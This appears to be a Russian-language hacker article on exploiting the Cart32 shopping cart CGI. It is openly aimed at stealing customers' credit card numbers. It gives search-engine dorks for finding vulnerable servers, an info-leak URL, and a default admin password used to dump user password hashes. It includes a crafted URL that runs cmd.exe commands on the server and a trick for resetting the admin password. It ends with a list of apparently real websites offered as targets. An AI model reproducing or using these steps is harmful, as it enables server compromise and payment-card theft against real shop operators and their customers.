Cart32 (http://www.cart32.com/)
- Shopping Cart System for Windows 95 & NT представляет из
себя “движок” для Он-лайн магазинов. А где
магазины, там, как известно, кредитные
карточки:).
Насколько мне известно,
последняя версия данного продукта – Cart31 v
3.6, является также уязвимой, как и ее
предшественники.
Для начала ты должен
научиться находить этот скрипт, по дефолту
он находится в директории CGI-BIN или SCRIPTS на
сервере. Если ты внимательно читал мои
прошлые статьи, то прекрасно знаешь как
искать незащищенные сервера через
поисковые системы. Итак, идем на АльтаВисту
(www.altavista.com) и
в окошке поиска вводим: “/scripts/cart32.exe/”, “/cgi-bin/cart32.exe/”
и начинаем разгребать ссылки:).
1) Если в системе разрешен запрос “ERROR”, то
пробуем: www.host.org/cgi-bin/cart32.exe/error. Скрипт может
вывести море информации по установленной
на серваке системе, листинг директории /cgi-bin/cart32
и директории, куда установлена программа (стандартно
- C:\Program Files\MWAInc\Cart32).
Пример:
INIFile = C:\Program Files\MWAInc\Cart32\cart32.ini
CGI Information
CGI_ServerSoftware = Microsoft-IIS/4.0
CGI_ServerName = www.host.org
CGI_RequestMethod = GET
CGI_Referer =
GI_RemoteHost = 313.373.3.333
CGI_RemoteAddr = 313.373.3.334
CGI_UserAgent = Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
CGI_ContentLength =0
CGI_ScriptName = /cgi-bin/cart32.exe
CGI_ServerURL =
CGI_GatewayInterface =CGI/1.1
CGI_ServerProtocol =HTTP/1.1
CGI_ServerPort = 80
CGI_ContentType =
CGI_QueryString =
CGI_PathInfo = /error
CGI_Cookie =
2) Если повезет, то админ
сервака проинсталлирует все в один каталог,
например в cgi-bin, и, прочитав лог об ошибке (см.
предыдущий пункт), мы увидим, что в директории
/cgi-bin/ находятся файлы blahblah-[число]. В этих
файлах находятся долгожданные кредитные
карточки ( в одном файле по одной креде).
Примечание : В старых версиях
вся информация о кредах хранилась в файле
blahblah-orders.txt
3) Стандартным паролем является "wemilo". C
данным паролем, вы можете пойти на
нижеприведенную ссылку, которая покажет
вам список всех юзеров и их хешированные
пароли:
http://www.victim.com/cgi-bin/cart32.exe/cart32clientlist
Воспользовавшись этой
уязвимостью, вы можете просмотреть список
всех пользователей и их хешированные
пароли. Хотя они и хешированные, их все
равно можно применить, введя
нижеприведенный URL:
http://www.host.org/cgi-bin/c32web.exe? TabName=Cart32%2B&Action=
Save+Cart32%2B+Tab&SaveTab= Cart32%2B&Client=foobar&ClientPassword=
e%21U%23_%25%28%5D%5D%26%25*%2B-a&Admin= &AdminPassword=&TabToSave=Cart32%2B&PlusTabToSave
=Run+External+Program&UseCMDLine=Yes&CMDLine= cmd.exe+%2Fc+dir+%3E+c%3A%5Czlob.txt
После успешного
выполнения этой операции, вся инфа будет
запишется в файл "zlob.txt" на диске C:\.
Более того, пойдя на
данный URL:
4) http://www.host.org/scripts/c32web.exe/
ChangeAdminPassword
можно сменить пароль
администратора, не зная старого :).
Это конечно же не все
уязвимости в этой проге, особо любопытные
перцы могут скачать (ftp://ftp.cart32.com/c32full.exe
- 3,82 MB) сие чудо и самим попробовать найти
уязвимости.
Чтобы вам не было скучно
– даю пару УРЛцев:
http://qwe.ds/cgi-bin/cart32.exe/error
http://www.tcsn.net/cgi-bin/cart32.exe/error
http://www.backstreet-publish.com/cgi-bin/cart32/aaa.log
http://www.backstreet-publish.com/cgi-bin/cart32.exe/error
http://www.dakotamade.com/CGI-BIN/CART32.EXE/cart32clientlist